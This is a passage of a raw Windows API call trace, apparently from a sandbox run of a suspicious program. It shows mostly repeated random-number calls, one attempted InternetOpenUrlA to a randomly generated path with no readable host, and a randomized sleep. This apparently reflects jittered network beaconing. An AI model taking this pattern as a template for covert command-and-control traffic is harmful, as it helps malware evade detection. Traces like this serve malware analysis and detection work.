[0209.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b264, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1b264) returned 0x0 [0209.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0209.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.517] GetProcessHeap () returned 0x440000 [0209.517] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0209.517] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0209.517] lstrcatA (in: lpString1="\x04", lpString2="/WykaiL9fauoaryjtce/xj9PsB4WL3qS2Xqh2Kt65izyxvaEdbpy31r/" | out: lpString1="\x04/WykaiL9fauoaryjtce/xj9PsB4WL3qS2Xqh2Kt65izyxvaEdbpy31r/") returned="\x04/WykaiL9fauoaryjtce/xj9PsB4WL3qS2Xqh2Kt65izyxvaEdbpy31r/" [0209.517] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0209.517] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/WykaiL9fauoaryjtce/xj9PsB4WL3qS2Xqh2Kt65izyxvaEdbpy31r/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0209.517] GetProcessHeap () returned 0x440000 [0209.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0209.517] GetProcessHeap () returned 0x440000 [0209.518] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0209.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0209.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0209.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0209.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0209.518] Sleep (dwMilliseconds=0x1511f) [0209.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0209.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.896] GetProcessHeap () returned 0x440000 [0209.896] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0209.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0209.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0209.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1682c, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a1682c) returned 0x0 [0209.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0210.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0210.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0210.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0210.370] BCryptGenRandom (in: hAlgorithm=0x0, 